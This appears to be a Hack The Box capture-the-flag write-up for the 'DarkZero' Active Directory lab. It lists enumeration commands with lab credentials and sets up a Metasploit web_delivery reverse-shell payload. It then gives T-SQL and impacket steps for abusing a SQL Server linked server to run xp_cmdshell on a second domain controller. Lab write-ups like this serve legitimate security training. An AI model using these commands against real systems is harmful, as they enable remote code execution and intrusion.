DarkZero - HTB Write-up
Difficulty: Hard
📋 Box Overview
DarkZero is a layered Active Directory challenge that simulates a realistic enterprise environment. This box requires chaining multiple advanced techniques including SQL linked servers, Kerberos delegation, ticket manipulation, and cross-subnet pivoting. You'll encounter multihomed hosts, split-horizon DNS, and various privilege escalation paths that demand both technical skill and persistence.
Key Learning Areas:
- Active Directory enumeration and exploitation
- SQL Server linked server abuse
- Kerberos ticket collection and Pass-the-Ticket attacks
- Network pivoting with Ligolo
- CVE exploitation for privilege escalation
Initial Credentials: john.w / RFulUtONCOL!
🔍 Enumeration
Port Scanning
Starting with a comprehensive nmap scan to identify open services:
nmap -p 1-65535 -T4 -A -v <target_ip>
Key Services Identified:
- DNS (53) - Simple DNS Plus
- Kerberos (88) - Windows Kerberos authentication
- LDAP (389/636/3268/3269) - Active Directory services
- SMB (139/445) - File sharing
- MSSQL (1433) - Microsoft SQL Server 16.00.1000.00
- WinRM (5985) - Remote management
- RPC (135, various high ports) - Remote procedure calls
Domain Information
Domain: darkzero.htb
Primary DC: DC01.darkzero.htb
Second DC: dc02.darkzero.ext (note the different DNS suffix: this host belongs to a separate domain, darkzero.ext)
Hosts File Generation
Using NetExec to automatically populate the hosts file:
nxc smb <target_ip> -u 'john.w' -p 'RFulUtONCOL!' --generate-hosts-file /etc/hosts
SMB Enumeration
smbmap -H <target_ip> -d 'darkzero.htb' -u 'john.w' -p 'RFulUtONCOL!'
Only default shares were present - no immediate vectors here. BloodHound enumeration also yielded minimal useful results.
DNS Enumeration - Critical Discovery
Querying for DNS records reveals something interesting:
dig @DC01.darkzero.htb ANY darkzero.htb
Important Finding:
The domain name resolves to two different IP addresses:
- a 10.x.x.x address (the lab-facing interface we scanned)
- 172.16.20.1 (an interface on an internal 172.16.20.x network)
This indicates that DC01 is multihomed, with a split-horizon style DNS setup that hands out an address per interface. The 172.16.20.x subnet is likely reachable only from inside the environment, so we'll need to pivot through DC01 to reach it.
💉 Initial Access via MSSQL
Setting Up Web Delivery
First, prepare a Meterpreter payload delivery mechanism:
msfconsole -q -x "use exploit/multi/script/web_delivery; \
set payload windows/x64/meterpreter/reverse_tcp; \
set LHOST tun0; \
set LPORT 443; \
set target 2; \
exploit -j"
Metasploit prints a PowerShell one-liner that fetches the stager over HTTP and runs it in memory; we'll execute it through xp_cmdshell once we have command execution.
MSSQL Connection
Connect to the SQL server using our credentials:
mssqlclient.py 'darkzero.htb/john.w:RFulUtONCOL!@<target_ip>' -windows-auth
Attempting Command Execution
Try enabling xp_cmdshell on DC01:
enable_xp_cmdshell
Result: ❌ Failed - insufficient privileges (john.w is not sysadmin on DC01)
Discovering Linked Servers
Enumerate linked SQL servers:
enum_links
Key Discovery:
- DC01 has a linked server entry pointing at DC02.darkzero.ext
- The link maps the local login darkzero\john.w to the remote login dc01_sql_svc
- dc01_sql_svc has higher privileges on DC02 than john.w has on DC01, so queries sent through the link run with more rights than we have locally
Exploiting Linked Server
Switch to the linked server:
use_link "DC02.darkzero.ext"
Now try enabling xp_cmdshell again, this time on DC02 through the link:
enable_xp_cmdshell
Result: ✅ Success!
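For readers who want to see what mssqlclient.py's enum_links, use_link and enable_xp_cmdshell do under the hood, and to check a link before relying on it, the following T-SQL is an added example, not code from the original write-up or from impacket. It assumes only the link name DC02.darkzero.ext and the remote login dc01_sql_svc from above; the catalog views and procedures are standard SQL Server.

```sql
-- Added example (not from the original write-up): the manual T-SQL behind
-- mssqlclient.py's enum_links / use_link / enable_xp_cmdshell, run as john.w
-- on DC01. Link name DC02.darkzero.ext and login dc01_sql_svc come from the
-- write-up; everything else is generic SQL Server.

-- 1. Enumerate linked servers and how local logins map to remote logins.
--    local_principal_id = 0 means "all local logins not otherwise mapped".
SELECT  s.name                           AS link_name,
        s.data_source,
        s.is_data_access_enabled,        -- OPENQUERY needs this = 1
        s.is_rpc_out_enabled,            -- EXEC ... AT needs this = 1
        COALESCE(p.name, '<all logins>') AS local_login,
        l.uses_self_credential,          -- 1 = pass the caller's own identity
        l.remote_name                    -- fixed remote login, e.g. dc01_sql_svc
FROM    sys.servers s
LEFT JOIN sys.linked_logins l     ON l.server_id    = s.server_id
LEFT JOIN sys.server_principals p ON p.principal_id = l.local_principal_id
WHERE   s.is_linked = 1;

-- 2. Who are we on the remote side, and is that login sysadmin there?
--    Quotes are doubled once because the query travels as a string literal.
SELECT * FROM OPENQUERY([DC02.darkzero.ext],
    'SELECT SYSTEM_USER AS remote_login,
            IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin');

-- 3. If is_sysadmin = 1 remotely, turn on xp_cmdshell on DC02 via the link.
--    sp_configure runs on the remote instance, not on DC01.
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;
       EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;')
    AT [DC02.darkzero.ext];

-- 4. Execute a command on DC02 as its SQL Server service account.
--    The web_delivery one-liner from earlier goes in place of whoami.
EXEC ('EXEC xp_cmdshell ''whoami /all''') AT [DC02.darkzero.ext];

-- Caveat: step 3/4 fail with "Server 'DC02.darkzero.ext' is not configured
-- for RPC" when RPC Out is off. Only a sysadmin on DC01 can flip it:
--   EXEC sp_serveroption 'DC02.darkzero.ext', 'rpc out', 'true';
-- Without that, you are limited to OPENQUERY, which cannot run procedures.
```

Run step 1 and 2 first: if the link maps you to a fixed remote login (remote_name populated, uses_self_credential = 0) and that login is sysadmin on the far side, the rest is a formality, which is exactly the john.w to dc01_sql_svc situation on this box. The RPC Out check matters because impacket's use_link/enable_xp_cmdshell path relies on EXEC ... AT, so a link with data access but no RPC Out will let you read data yet refuse command execution.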